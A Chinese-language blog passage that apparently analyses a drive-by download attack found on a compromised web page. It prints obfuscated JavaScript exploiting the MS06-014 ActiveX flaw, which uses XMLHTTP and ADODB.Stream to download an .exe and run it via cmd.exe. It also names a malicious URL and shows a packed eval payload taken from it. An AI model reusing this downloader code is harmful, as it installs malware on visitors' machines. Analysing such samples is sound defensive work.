//核心代码
..............
" var Bf=document.createElement(\"\o\b\j\e\c\t\");" "\n"
" Bf.setAttribute(\"\c\l\a\s\s\i\d\",\"\c\l\s\i\d\:\B\D\9\6\C\5\5\6\-\6\5\A\3\-\1\1\D\0\-\9\8\3\A\-\0\0\C\0\4\F\C\2\9\E\3\6\");" "\n"
" var Kx=Bf.CreateObject(\"\M\i\c\r\o\s\o\f\t\.\X\" \"\M\L\H\T\T\P\",\"\");" "\n"
" var AS=Bf.CreateObject(\"\A\d\o\d\b\.\S\t\r\e\a\m\",\"\");" "\n"
.............
" var cF=Bf.CreateObject(\"\S\c\r\i\p\t\i\n\g\.\F\i\l\e\S\y\s\t\e\m\O\b\j\e\c\t\",\"\");" "\n"
" var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);" "\n"
" AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject(\"\S\h\e\l\l\.\A\p\p\l\i\c\a\t\i\o\n\",\"\");" "\n"
" ok1=cF.BuildPath(NsTmp \'\\\\\s\y\s\t\e\m\3\2\',\'\c\m\d\.\e\x\e\');" "\n"
" q.SHeLLExecute(ok1,\'\ \/\c \' Ns1,\"\",\"\o\p\e\n\",0);" "\n"
..............
上面的就是最为核心的代码,利用MS0614漏洞、创建JS异步对象获取病毒(*.exe)文件,然后运行,这样就达到它的目的啦!
3、打开 http://9-6.IN/s368/T368.htm 查看源代码,又发现一段怪异的JS文件,如下:
<script>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('x("\\0\\6\\9\\5\\i\\h\\j\\j\\4\\f\\8\\3\\2\\0\\7\\1\\i\\8\\2\\3\\h\\g\\4\\w\\v\\u\\t\\b\\s\\7\\r\\g\\4\\e\\f\\q\\8\\3\\2\\0\\7\\1\\e\\4\\d\\c\\d\\c\\p\\5\\3\\o\\n\\a\\6\\1\\b\\m\\2\\0\\1\\a\\l\\0\\6\\9\\5\\k")',34,34,'151|164|162|143|42|157|156|160|163|146|145|56|12|
15|76|74|134|75|40|11|51|50|167|155|165|144|57|147|152|70|66|63|123
|eval'.split('|'),0,{}))
</script>
可以看出这段代码也是经过加密的了,特征为function(p,a,c,k,e,d),这种加密方法网上有很多例子,我就不细说了,附上解密代码:
//以下代码为网上搜索所得,版权归原作者所有
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>无标题文档</title>
</head>
<body>
<script>
a=62;
function encode() {
var code = document.getElementById('code').value;
code = code.replace(/[\r\n] /g, '');
code = code.replace(/'/g, "\\'");
评论加载中…
 |